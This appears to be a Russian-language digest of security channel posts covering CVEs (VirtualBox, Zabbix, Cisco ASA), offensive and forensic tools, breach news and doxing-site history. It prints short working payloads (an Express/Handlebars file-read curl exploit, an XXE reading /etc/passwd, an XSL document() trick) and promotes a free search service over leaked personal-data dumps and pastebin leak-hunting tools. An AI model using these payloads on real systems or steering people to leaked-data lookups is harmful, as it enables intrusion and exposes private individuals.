CVE-2024-21111

Повышение привилегий до SYSTEM с помощью VirtualBox. Эксплуатация Arbitrary File Write/Delete с помощью симлинков, \RPC Control\, в связке с DLL Hijacking.

Ресерч: https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/

https://github.com/badkeys/badkeys

Опенсорсная утилита, которая проверяет публичные ключи на наличие известных уязвимостей, с помощью которых можно было бы восстановить приватные ключи.

Успешные примеры использования:
— атака Ферма на RSA: слабые RSA-ключи, сгенерированные прошивкой принтера, были тривиально взломаны с помощью алгоритма факторизации Ферма.
— сертификаты с ключами ROCA: публичные ключи, которые использовала Yahoo, были уязвимы для атаки ROCA.
— сертификаты с тестовыми ключами OpenSSL: утилита нашла сертификаты, для которых были известны приватные ключи.

Существует веб-версия https://badkeys.info/

ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices

Кто-то ломает Cisco, Cisco Talos бьет тревогу. Некий правительственный актор (как предполагает компания, китайцы или россияне) уже пять месяцев терроризирует промышленную инфраструктуру, взламывая брандмауэры ASA (CVE-2024-20353) и FTD (CVE-2024-20359).

Получив доступ, внутри разворачиватся имплант Line Dancer, который отключает системные логи, хукает hash dump процесс (чтобы заблокировать создание дампа), и устанавливает бекдор, — который переопределяет указатель со стандартного кода host-scan-reply (участвует при создании сеанса SSL VPN) на собственный интерпретатор шеллкода.

В январе уже массово взламывали сервера Ivanti Connect Secure, которые некоторые связывают с этой же группой.

The Kubenomicon

Матрица угроз в стиле MITRE ATTACK для Kubernetes, ориентированная на наступательную безопасность. С акцентом на то, как использовать каждую атаку.

1. Initial access
— Using cloud credentials
— Compromised image In registry
— Kubeconfig file
— Application vulnerability
— Exposed sensitive interfaces
— SSH server running inside container

2. Execution
— Exec inside container
— New container
— Application exploit (RCE)
— Sidecar injection

3. Persistence
— Backdoor container
— Writable hostPath mount
— Kubernetes cronjob
— Malicious admission controller
— Container service account
— Static pods

4. Privilege escalation
— Privileged container
— Cluster-admin binding
— hostPath mount
— Access cloud resources

5. Defense evasion
— Clear container logs
— Delete events
— Pod name similarity
— Connect from proxy server

6. Credential access
— List K8S secrets
— Access node information
— Container service account
— Application credentials in configuration files
— Access managed identity credentials
— Malicious admission controller

7. Discovery
— Access Kubernetes API server
— Access Kubelet API
— Network mapping
— Exposed sensitive interfaces
— Instance Metadata API

8. Lateral movement
— Access cloud resources
— Container service account
— Cluster internal networking
— Application credentials in configuration files
— Writable hostPath mount
— CoreDNS poisoning
— ARP poisoning and IP spoofing

9. Collection
— Images from a private registry
— Collecting data from pod

Godot RE Tools

Godot RE Tools — инструмент для реверс-инжиниринга игр, написанных на Godot Engine. Принимает на вход саму игру, в формате pck/exe/apk, на выходе возвращает восстановленный проект, готовый для импорта в игровой движок.

Пример использования
gdre_tools --headless --recover=game.exe

Cheatsheet: Linux Forensics Analysis

Шпаргалка по исследованию потенциально взломанной системы Linux для сбора артефактов. По сути, это готовый copy/paste список действий, которые необходимо выполнить в определенном порядке.

Validate compromised
— Interviewing client/user/administrator

Live response and triage script
— Linux-CatScale
— UAC
— Fennec

Live response commands
— General information
— Logon activities
— Review processes
— Recover deleted process’s binary
— Review network
— Review activities
— Hunting unusual files
— Installed programs
— File investigation
— Persistent mechanisms
— Unusual system resources

Compromised assestment scanning
— THOR Lite

Hunting rootkit
— To hunt via 3rd party software
— Hunting and check files, processes
— Investigate loaded kernel modules

Collect evidences
— Disk imaging using dd

Memory acquisition
— AVML
— LIME

Investigation and analysis
— Live response and triage script analysis
— Memory analysis with Volatility

Disk analysis
— Directories and Files Analysis
— Log analysis
— Privilege escalation hunting ideas
— File recovery
— Generate Timeline analysis

https://github.com/P1sec/QCSuper

У процессоров Qualcomm есть полностью проприетарный протокол Diag, DM, или QCDM — который расшифровывается как Qualcomm Diagnostic monitor.

Этот протокол обычно используют для отладки, и в Android-смартфонах он тоже есть, — там он представлен интерфейсом /dev/diag.

Умеет он много, например:
— отдавать информацию об устройстве
— выполнять команды, связанные с вызовами и сообщениями
— взаимодействовать с GPS
— работать с протоколами 2G/3G/4G
— менеджить файлы на крошечной EFS
— читать и писать в постоянную и энергозависимой память

QCSuper — это утилита, которая позволяет взаимодействовать с ним, и использовать некоторые его фичи — например, перехватывать сырой 2G/3G/4G трафик, чтобы проанализировать его в Wireshark.

Достаточно иметь рутованный смартфон и подключиться по ADB, вот пример использования
sudo ./qcsuper.py --adb --wireshark-live

О том, как это работает низкоуровневого, и что можно увидеть в трафике, читаем тут Presenting QCSUPER: A tool for capturing your 2G/3G/4G air traffic on QUALCOMM-based phones.

A recent security incident involving Dropbox Sign

Злоумышленники взломали учетную запись службы в бэкенде Sign, у которой были привилегии для выполнения различных действий в продакшн среде. Затем они использовали этот доступ для получения доступа к базе данных клиентов.

В ходе расследования выяснилось, что злоумышленники получили доступ к данным, включая информацию о клиентах: электронную почту, имена пользователей, номера телефонов и хэшированные пароли.

Кроме того, были скомпрометированы настройки информация о настройках, и информация об аутентификации, например, API-ключи, OAuth-токены и данные о многофакторной аутентификации пользователей.

Dropbox Sign взломали и слили всю базу, включая секреты для TOTP. Sign — это сервис, через через который можно шарить и подписывать документы онлайн.

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

Ставишь ExpressJs с шаблонизатором Handlebars:

npx express-generator
express --view hbs

Бонусом получаешь LFR и, потенциально, RCE.

Пример непримечательного кода

var express = require('express');
var router = express.Router();

router.post('/', function(req, res, next) {
  var profile = req.body.profile
   res.render('index', profile)
});

module.exports = router;

А теперь эксплойт для LFR, чтобы прочитать исходники

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://localhost:9090/'

Внутри миддлвары, в процессе рендера, на самом деле существует параметр layout, который получается переопределить, благодаря нашему переданному словарю.

С точки зрения кода, вместо

res.render('index', profile)

Правильно использовать

res.render('index', { profile })

Но даже так остается риск эксплуатации с помощью классического Prototype Pollution.

До того, как многие узнали о спортиках и начали наблюдать за их "творчеством" в Telegram, существовал отдельный сервис, определивший эту эпоху.

Началось еще все в далеком 2002 году, когда появился минималистичный сайт, который назвали Pastebin. Там можно было делиться длинными текстами, но была цензура.

Те, кому не нравилось, как их тексты удаляли, а аккаунты банили, начали создавать свои аналоги. Со временем, Pastebin стал не просто сайтом, а отдельной категорией друг на друга похожих сервисов, куда ты мог написать что угодно.

Потом появился знаменитый Exposed от "русских хакеров", а с его закрытием расцвел Doxbin. Его отличало то, что он был доступен из клирвеба, был анонимным (как потом выяснилось, это было не так), а значит и не выдавал инфу о своих пользователях (ее ведь не было?).

Благодаря этому, он быстро набрал популярность у теневых групп и стал одним из самых известных сайтов для доксинга, — места, где каждый день десятками страниц выкладывался компромат на кого угодно, и это поощрялось.

Дошло все до того, что в 2019 всеми известный журналист Брайан Кребс, который и сам любит делать нечто похожее, пожаловался на то, как там "белые супрематисты" призывают к терроризму, взламывают всякое и выкладывают данные агентов ФБР.

На днях Doxbin "закрыли". Опубликованное фото создателя, скорее всего, постановочное. А сам сервис, вероятно, возродится, как и BreachForums (напомню, его уже арестовывают не в первый раз).

Однако, это всего один сайт. Тот самый Pastebin без запрещенки, куча его клонов, и клонов Doxbin'а, все еще продолжают существовать.

И за то время, пока они существуют, начиная с двухтысячных, там скопилось много по-настоящему любопытной информации.

Вот небольшая подборка поисковиков по этим сервисам:
— RedHunt Labs Online IDE Search — полезен, чтобы искать NDA-исходники закрытых сервисов (когда разработчики ими делятся друг с другом), ищет более чем на 40 сайтов
— Pasta — многопоточный утилита на Python для поиска утечек по Pastebin со множеством опций
— Pastebin Search Engines — веб-поисковик от Cipher387, ориентированный на поиск дампов, API-ключей, токенов и персональных данных
— Sniff Paste — как Pasta, но для поиска в режиме реального времени, полезно использовать в процессе Threat Intelligence
— Pastebin Bisque — скрипт для дампа профилей с Pastebin.
— Awesome Pastebin — большой каталог сайтов из категории Pastebin.

CVE-2024-22120 ToolKit

Из админки Zabbix пользователь может выполнять заранее созданные скрипты (по умолчанию, ping и traceroute).

После выполнения скрипта, событие записывается в Audit Log. В событии есть поле с клиентским IP. Из-за того, что он не санитизируется, это приводит к SQL-инъекции.

https://support.zabbix.com/browse/ZBX-24505

Скрипт получает сессию админа и прокидывает реверс-шелл.

https://github.com/gh2o/bash_tls/

Минимальная (<1000 строк кода) реализация TLS 1.2 на чистом Bash.

Хорошее дополнением к теории The Illustrated TLS 1.2 Connection. Читаем и сравниваем.

ChatGPT помог заработать $28 000 на 0-day.

Базовый XXE-пейлоад выглядит как-то так
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Можно залить файл с таким содержимым на сервер и, если у либы, которая его распарсит, включена поддержка внешних сущностей, на выходе мы получим содержимое /etc/passwd.

Это касается библиотек, но не браузеров. Если вы откроете нечто подобное у себя в Chrome, то ничего не сработает, т.к. в нем external entities отключены по дефолту.

Но выяснился забавный факт.

Помимо XML, современные браузеры поддерживают еще много форматов, например, XSL. Это старая спека, которая является надстройкой над XML со своими директивами.

О нем и о том, что там тоже можно объявлять внешние сущности, почему-то все забыли, но напомнил ChatGPT. Он подсказал, что это можно делать с помощью директивы, вроде
<xsl:copy-of select="document('file:///etc/passwd')"/>
которая подгрузит содержимое, вопреки всем запретам.

Поэтому полная цепочка выглядит так:
1. Создаем XSL пейлоад с функцией document()
2. Импортируем полученное содержимое как внешнюю сущность в XML
3. Готовый XML-пейлоад вставляем в SVG-картинку и используем по назначению ;)

💰 Выплаты
Apple (CVE-2023-40415): $25 000
Google (CVE-2023-4357): $3 000

“Incognito Market” Owner Arrested for Operating One of the Largest Illegal Narcotics Marketplaces on the Internet

Недавно арестовали владельца маркетплейса Incognito Market, который служил для продажи наркотиков. Сам сервис просуществовал 4 года, а совокупный доход превысил $100 млн.

Но забавно то, как нашли его владельца, ведь вычислить его удалось почти сразу же, как Incognito Market появился на свет.

7 мая 2021 — запрос в Google: one pixel attack for fooling deep neural networks github.
В тот же день на форуме появляется сообщение One pixel attacks should deem the spammers/DDoSers ML efforts to fail и ссылка на гитхаб, по которой он переходил.

3 сентября 2021 — slot game terminology, с 4 по 7 сентября — он уточняет подробности и кодит.
На следующий день в публичном чейнджлоге появляется запись Integrated online casino. А спустя неделю — уже и анонс от самого админа о появлении казино на сайте.

Потом идут еще некоторые фичи, которые точно также трейсили по запросам и посещениям в Google, вроде внутреннего чата и Cryptopunk-аватарок на сайте.

19 июля 2022 года в 23:30 сервер уходит в оффлайн, причина — агенты ФБР отключают и дампят его содержимое.

А в 00:18, 00:19, 00:20, и 00:23 Линь (владелец маркетплейса) начинает лихорадочно стучать по клавишам и гуглить со своей учетки pm2 crashed, view pm2 daemon logs, pm2 daemon logs и pm2 changelog, — за этим процессом, как и ранее, но уже в реальном времени наблюдают сотрудники спецслужбы.

Кроме того, с криптокошелька, на который поступали грязные деньги, он оплатил домен для собственного сайта-порфолио https://rs.me, на котором называет себя Backend & Blockchain Engineer, Monero Enthusiast и постит ссылку на свой Github, с PoW-Shield — системой защиты от DDOS атак, которую он написал, и использовал на сайте Incognito Market.

Арест произошел в аэропорту Джона Кеннеди, куда Линь прилетел в качестве туриста.

Karma Project

Они нам звонят и говорят: «У нас дохуя баз данных, нам нужно их объединять, нам нужен Data Lake». Я отвечаю: «Да вот, блять, чувак уже сделал! Нахуй вы дрочите велосипед!?»

Альтернатива Глаза Бога от BadB. Можно искать по более чем 300 дампам, включая VKPay, Avito, Geekbrains, Сбербанк, Спортмастер, и, конечно, СДЭК.

Полностью бесплатно, без регистрации и СМС.

https://github.com/SafeBreach-Labs/DoubleDrive

Многие шифровальщики похожи. EDR могут обнаружить их с помощью мониторинга процессов, которые изменяют много файлов, или отслеживания распространенных действий перед шифрованием, таких как удаление теневых копий.

Но что, если существует способ зашифровать все конфиденциальные данные не выполняя код на конечных устройствах?

Мы доказали, что это возможно.

OneDrive как FUD Cloud Ransomware, код выложили только сейчас. Проломить учетку, слинкованную с конкретной машиной, и шифровать, жонглируя симлинками и API-запросами.

Доклад с Black Hat (преза): https://www.youtube.com/watch?v=O7y-b85HpSg

Текстовая версия: https://www.safebreach.com/blog/one-drive-double-agent-clouded-onedrive-turns-sides/

TotalRecall

Утилита для поиска, извлечения и анализа всех собранных технологией Recall-данных. На выходе отдает снимки и текст, который удалось распознать, включая историю браузера, переписки, пароли и номера кредитных карт.

Принцип работы сводится к тому, чтобы собрать файлы из ImageStore, добавить к ним расширение .jpg, и получить скриншоты. Все остальное хранится плеинтекстом в SQLite.

Поддерживает фильтры по дате и ключевым словам, после выполнения работы создается готовый отчет.